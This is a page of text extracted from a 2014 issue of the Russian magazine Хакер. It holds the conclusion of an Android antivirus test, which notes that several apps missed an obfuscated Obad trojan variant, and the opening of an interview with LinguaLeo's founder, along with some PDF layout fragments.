Mobile Security & Antivirus (Avast Software)
360 Mobile Security
Lookout Mobile Security

ťśŦŘűşŘŢŞŦśANDROID-ŖţŨŞŘŞŦũŧ

В 2008 году было объявлено о разработке первого в истории человечества антивируса для Android —VirusGuard. Занималась этим вопросом малоизвестная компания SMobile Systems. Сейчас этот проект либо мертв, либо строго засекречен. Причина подобного исхода событий весьма очевидна — первые вирусы массового поражения для Android появились только в 2010 году.

ЗАКЛЮЧЕНИЕ

В целом из результатов видно, что антивирусы свою работу делают. Предпочитая ту, что полегче :), поскольку код, защищенный от распознавания, вызывает у них трудности (три из пяти просмотрели модификацию шифрующегося троянца Obad). А что касается двух отличников теста, то с вероятностью 99,9% можно утверждать, что образцы сборок, использующихся в данном тесте, наверняка прошли через руки экспертов этих компаний. Что посоветовать читателю, который еще для себя не определился с выбором Android-антивируса? Во-первых, использовать антивирусы, произведенные крупными компаниями, обладающими обширными и непрерывно пополняемыми базами вирусов. А основным критерием выбора среди них может стать наличие определенных специфических фишек, нужных тебе в повседневной жизни. К примеру, геофенсинг или консультант по защите.

hang

NOW!

BUY

Интервью

w Click

ХАКЕР 04 /183/w

2014

-xcha

-x cha

С самого

начала

Айнур Абдулнасыров

Основатель LinguaLeo, сервиса для изучения иностранных языков

Факты

•Основатель и руководитель компании LinguaLeo.

•Окончил Высшую школу экономики.

•Также сооснователь сервиса заказа артистов Treda.ru и «агрега-

тора» фотографов ImageStars.net.

Беседовал

Степан Ильин

Мы не так часто предлагаем тебе нетехнические истории, но история LinguaLeo — хороший повод, чтобы сделать исключение. Ведь даже если ты бог кодинга, то для создания айтишной компании с нуля тебе понадобится изучить еще

тысячу разных вещей, от подбора кадров и поиска офиса до организации разработки и построения связей в команде. И кто может научить этому лучше, чем создатели веб-сервиса, которым удалось впятером за полгода сделать не просто рабочий прототип, но и основу всей будущей компании?

<<< < Предыдущая 1 23 / 153 4 5 6 7 8 9 10 11 12 13 14 15 > Следующая >>>

Соседние файлы в папке журнал хакер

#
20.04.202415.33 Mб12178_Optimized.pdf
#
20.04.202425.55 Mб12179_Optimized.pdf
#
20.04.202451.23 Mб12180_compressed.pdf
#
20.04.202423.5 Mб12181_Optimized.pdf
#
20.04.202426.52 Mб12182_Optimized.pdf
#
20.04.202428.5 Mб12183_Optimized.pdf
#
20.04.202422.1 Mб12184_Optimized.pdf
#
20.04.202423.69 Mб12185_Optimized.pdf
#
20.04.202425.1 Mб12186_Optimized.pdf
#
19.04.202429.32 Mб13187_Optimized.pdf
#
20.04.202419.96 Mб12188_Optimized.pdf